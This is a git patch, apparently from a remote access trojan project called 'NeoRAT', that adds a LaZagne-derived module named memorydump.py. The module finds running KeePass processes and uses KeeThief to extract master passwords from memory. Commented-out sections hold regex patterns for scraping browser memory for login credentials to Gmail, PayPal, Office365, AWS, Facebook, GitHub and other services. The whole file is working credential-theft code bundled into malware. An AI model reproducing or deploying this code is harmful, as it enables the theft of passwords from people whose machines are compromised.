From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001 From: AL-LCL Date: Fri, 19 May 2023 11:01:49 +0200 Subject: NeoRAT --- .../lazagne/softwares/memory/memorydump.py | 117 +++++++++++++++++++++ 1 file changed, 117 insertions(+) create mode 100644 foreign/client_handling/lazagne/softwares/memory/memorydump.py (limited to 'foreign/client_handling/lazagne/softwares/memory/memorydump.py') diff --git a/foreign/client_handling/lazagne/softwares/memory/memorydump.py b/foreign/client_handling/lazagne/softwares/memory/memorydump.py new file mode 100644 index 0000000..c4a256c --- /dev/null +++ b/foreign/client_handling/lazagne/softwares/memory/memorydump.py @@ -0,0 +1,117 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +# Author: Nicolas VERDIER (contact@n1nj4.eu) + +""" +This script uses memorpy to dumps cleartext passwords from browser's memory +It has been tested on both windows 10 and ubuntu 16.04 +The regex have been taken from the mimikittenz https://github.com/putterpanda/mimikittenz +""" + +from .keethief import KeeThief +from foreign.client_handling.lazagne.config.module_info import ModuleInfo +from foreign.client_handling.lazagne.config.constant import constant +from foreign.client_handling.lazagne.config.winstructure import get_full_path_from_pid +from foreign.client_handling.lazagne.config.lib.memorpy import * + + +# Memorpy has been removed because it takes to much time to execute - could return one day + +# create a symbolic link on Windows +# mklink /J memorpy ..\..\..\..\external\memorpy\memorpy + +# password_regex=[ +# "(email|log(in)?|user(name)?)=(?P.{1,25})?&.{0,10}?p[a]?[s]?[s]?[w]?[o]?[r]?[d]?=(?P.{1,25})&" +# ] + +# grep to list all URLs (could be useful to find the relation between a user / password and its host) +# http_regex=[ +# "(?Phttp[s]?:\/\/[a-zA-Z0-9-]{1,61}(\.[a-zA-Z]{2,})+)" +# ] + +# password_regex=[ +# ("Gmail","&Email=(?P.{1,99})?&Passwd=(?P.{1,99})?&PersistentCookie="), +# ("Dropbox","login_email=(?P.{1,99})&login_password=(?P.{1,99})&"), +# ("SalesForce","&display=page&username=(?P.{1,32})&pw=(?P.{1,16})&Login="), +# ("Office365","login=(?P.{1,32})&passwd=(?P.{1,22})&PPSX="), +# ("MicrosoftOneDrive","login=(?P.{1,42})&passwd=(?P.{1,22})&type=.{1,2}&PPFT="), +# ("PayPal","login_email=(?P.{1,48})&login_password=(?P.{1,16})&submit=Log\+In&browser_name"), +# ("awsWebServices","&email=(?P.{1,48})&create=.{1,2}&password=(?P.{1,22})&metadata1="), +# ("OutlookWeb","&username=(?P.{1,48})&password=(?P.{1,48})&passwordText"), +# ("Slack","&crumb=.{1,70}&email=(?P.{1,50})&password=(?P.{1,48})"), +# ("CitrixOnline","emailAddress=(?P.{1,50})&password=(?P.{1,50})&submit"), +# ("Xero ","fragment=&userName=(?P.{1,32})&password=(?P.{1,22})&__RequestVerificationToken="), +# ("MYOB","UserName=(?P.{1,50})&Password=(?P.{1,50})&RememberMe="), +# ("JuniperSSLVPN","tz_offset=-.{1,6}&username=(?P.{1,22})&password=(?P.{1,22})&realm=.{1,22}&btnSubmit="), +# ("Twitter","username_or_email%5D=(?P.{1,42})&session%5Bpassword%5D=(?P.{1,22})&remember_me="), +# ("Facebook","lsd=.{1,10}&email=(?P.{1,42})&pass=(?P.{1,22})&(?:default_)?persistent="), +# ("LinkedIN","session_key=(?P.{1,50})&session_password=(?P.{1,50})&isJsEnabled"), +# ("Malwr","&username=(?P.{1,32})&password=(?P.{1,22})&next="), +# ("VirusTotal","password=(?P.{1,22})&username=(?P.{1,42})&next=%2Fen%2F&response_format=json"), +# ("AnubisLabs","username=(?P.{1,42})&password=(?P.{1,22})&login=login"), +# ("CitrixNetScaler","login=(?P.{1,22})&passwd=(?P.{1,42})"), +# ("RDPWeb","DomainUserName=(?P.{1,52})&UserPass=(?P.{1,42})&MachineType"), +# ("JIRA","username=(?P.{1,50})&password=(?P.{1,50})&rememberMe"), +# ("Redmine","username=(?P.{1,50})&password=(?P.{1,50})&login=Login"), +# ("Github","%3D%3D&login=(?P.{1,50})&password=(?P.{1,50})"), +# ("BugZilla","Bugzilla_login=(?P.{1,50})&Bugzilla_password=(?P.{1,50})"), +# ("Zendesk","user%5Bemail%5D=(?P.{1,50})&user%5Bpassword%5D=(?P.{1,50})"), +# ("Cpanel","user=(?P.{1,50})&pass=(?P.{1,50})"), +# ] + +browser_list = ["iexplore.exe", "firefox.exe", "chrome.exe", "opera.exe", "MicrosoftEdge.exe", "microsoftedgecp.exe"] +keepass_process = 'keepass.exe' + + +class MemoryDump(ModuleInfo): + def __init__(self): + options = {'command': '-m', 'action': 'store_true', 'dest': 'memory_dump', + 'help': 'retrieve browsers passwords from memory'} + ModuleInfo.__init__(self, 'memory_dump', 'memory', options) + + def run(self): + pwd_found = [] + for process in Process.list(): + # if not memorpy: + # if process.get('name', '').lower() in browser_list: + # # Get only child process + # try: + # p = psutil.Process(process.get('pid')) + # if p.parent(): + # if process.get('name', '').lower() != str(p.parent().name().lower()): + # continue + # except: + # continue + # + # try: + # mw = MemWorker(pid=process.get('pid')) + # except ProcessException: + # continue + # + # self.debug(u'dumping passwords from %s (pid: %s) ...' % (process.get('name', ''), + # str(process.get('pid', '')))) + # for _, x in mw.mem_search(password_regex, ftype='groups'): + # login, password = x[-2:] + # pwd_found.append( + # { + # 'URL' : 'Unknown', + # 'Login' : login, + # 'Password' : password + # } + # ) + + if keepass_process in process.get('name', '').lower(): + full_exe_path = get_full_path_from_pid(process.get('pid')) + k = KeeThief() + if k.run(full_exe_path=full_exe_path): + for keepass in constant.keepass: + data = keepass.get('KcpPassword', None) + if data: + pwd_found.append({ + 'Category': 'KeePass', + 'KeyType': data['KeyType'], + 'Login': data['Database'], + 'Password': data['Password'] + }) + + return pwd_found -- cgit v1.2.3